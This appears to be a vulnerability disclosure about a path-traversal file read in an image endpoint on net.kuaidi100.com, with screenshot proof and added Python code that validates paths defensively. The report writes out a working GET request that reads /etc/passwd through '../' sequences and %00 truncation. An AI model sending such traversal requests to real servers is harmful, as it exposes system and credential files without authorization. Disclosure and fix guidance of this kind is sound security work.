### Brief description:
As the title says.
### Details:
```
http://net.kuaidi100.com/youshang-network/logined/auditInfo?method=auditInfoView
```
The photo-viewing endpoint allows arbitrary file read, using `%00` truncation:
```
GET /youshang-network/getImage?path=2015-07%2F2015-07-22%2F../../../../../../../etc/passwd%00.jpg HTTP/1.1
Host: net.kuaidi100.com
Proxy-Connection: keep-alive
Accept: image/webp,*/*;q=0.8
User-Agent:
Referer: http://net.kuaidi100.com/youshang-network/logined/auditInfo?method=auditInfoView
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie:
```
[<img src="https://images.seebug.org/upload/201507/22134906157572b036364153e907cc7837e454c9.png" alt="金碟2.png" width="600">](https://images.seebug.org/upload/201507/22134906157572b036364153e907cc7837e454c9.png)
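An added example, not code from the original report or from the affected application: one way a file-serving handler can reject the `path` value shown above, by refusing control bytes, canonicalizing, checking containment and only then checking the extension. The upload root, the extension allow-list and the function name are assumptions made for illustration.

```python
import os
from urllib.parse import unquote

# Hypothetical values: the real upload root and allowed types are not on the page.
IMAGE_ROOT = "/srv/app/uploads"
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}


def resolve_image_path(raw_value, root=IMAGE_ROOT):
    """Map a raw `path` query value to a canonical file under root, or None."""
    value = unquote(raw_value)  # the value as it appears on the wire

    # A NUL byte can end the name early in runtimes that pass it to C-level
    # file APIs, so a suffix check sees ".jpg" while a different file is
    # opened. Reject NUL and every other control character outright.
    if any(ord(ch) < 0x20 for ch in value) or "\\" in value:
        return None
    if os.path.isabs(value):
        return None

    # Canonicalize first (collapses "..", follows symlinks), then require the
    # result to stay inside the upload root.
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, value))
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None

    # Check the extension on the canonical name, not on the raw input.
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXT:
        return None
    return candidate


if __name__ == "__main__":
    samples = [
        # Constructed benign value in the same date-folder layout.
        "2015-07%2F2015-07-22%2Fphoto.jpg",
        # Value from the request in the report.
        "2015-07%2F2015-07-22%2F../../../../../../../etc/passwd%00.jpg",
    ]
    for sample in samples:
        print(sample, "->", resolve_image_path(sample))
```

Serving files by an opaque ID looked up in a database, instead of a client-supplied path, removes the need for this validation entirely.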
### Proof of vulnerability:
[<img src="https://images.seebug.org/upload/201507/2213483934019afba6694a12223131981b638be4.png" alt="金碟1.png" width="600">](https://images.seebug.org/upload/201507/2213483934019afba6694a12223131981b638be4.png)